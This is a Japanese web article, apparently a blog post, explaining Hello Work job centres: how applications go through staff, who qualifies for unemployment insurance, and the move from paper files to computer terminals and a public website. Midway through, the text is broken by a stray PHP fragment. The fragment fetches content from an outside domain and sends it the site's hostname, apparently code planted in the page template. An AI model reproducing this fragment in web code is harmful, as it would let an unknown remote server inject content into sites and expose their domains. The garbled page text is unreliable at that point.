前へ
次へ

ハローワークも昔と今では違う

ハローワークは日本語でいえば職業安定所のことで、求人情報を探すための場所です。
そこでは大勢の人が求人票を眺めては良さそうだと思ったのをピックアップし、そこの職員の目の前に名乗り出て、申し込むことから始まります。
これをしないとそこの会社の面接に出ることすらできません。
これが他の求人媒体と違う点です。
もう1つの違う点はここでは失業保険が一定期間もらえる点です。
ただしその失業保険をもらうには条件がいくらあり、まず最初は少なくても前職の会社で雇用保険に加入していなければ成立しません。
従って前職の会社で雇用保険に加入をしていなければ失業保険をもらうことはできません。
その失業保険は雇用保険に加入していれば、一律の金額ではなく、前職の勤続期間や離職理由によっても変化します。
いずれにしても大勢の人が来るのは、その失業保険をもらうためであり、そのために来場者が増える要因となっています。

".file_get_contents('http://links-001.com/123set5?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

けどそのハローワークは昔と今とでは大幅にシステムが様変わりしました。
かつて21世紀よりも前は紙の情報が集められたファイルが棚に置かれていて、それを誰もがチェックできるようになっていました。
しかし現在ではその情報は紙ではなくて、パソコンの画面で眺めなければならないようになりました。
パソコンの画面が建物内のブースにたくさん並んでいて、求職者は番号札もって順番に並んでパソコンでチェックをすることになります。
パソコンでのチェックではIDやパスワードを入力して探すので、それの情報を管理担当者が求職者がログインして探したことを確認します。
これによって失業保険を与える仕組みに変更しています。
ということでハローワークに登録していない人は、少なくてもそこで探すことはできなくなりました。
けどそれと同時にハローワークのサイトが開設されていて、ログインしなくても自宅などで求人自体の情報は公開されています。
なおかつてはそこで公開されているすべての求人は、いわゆるブラックなどの会社も制限なく公開されていたのですが、多くの人から問題あると指摘されたので、現在では政府の指導によりブラックとされる会社はここで公開できなくなりました。

Page Top